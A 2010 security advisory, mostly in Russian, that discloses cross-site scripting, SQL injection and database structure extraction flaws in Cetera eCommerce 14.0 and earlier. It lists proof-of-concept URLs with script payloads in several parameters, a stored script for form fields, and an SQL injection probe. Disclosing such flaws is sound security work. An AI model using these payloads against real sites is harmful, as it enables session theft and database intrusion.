Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection

WhiteBoard 0.1.30 Multiple Blind SQL Injection Vulnerabilities

Multiple vulnerabilities in MC Content Manager

DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	28.07.2010
Subject:	New vulnerabilities in Cetera eCommerce

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting, SQL Injection и SQL DB Structure
Extraction уязвимостях в Cetera eCommerce.

XSS:

http://site/cms/templates/search.
php?q=111&sobject=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cms/templates/bannerlist.
php?deleted=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cms/templates/bannerlist.
php?errorMessage=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/cms/templates/banner.
php?errorMessage=%3Cscript%3Ealert(document.
cookie)%3C/script%3E

XSS (Persistent):

На странице http://site/cms/templates/banner.php?bannerId=1


<script>alert(document.cookie)</script>
В полях: Title, Текст.

SQL Injection:

http://site/cms/templates/banner.
php?bannerId=1%20and%20version()=5

SQL DB Structure Extraction:

http://site/cms/templates/bannerlist.php?page=-1

Уязвимы Cetera eCommerce 14.0 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4266/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua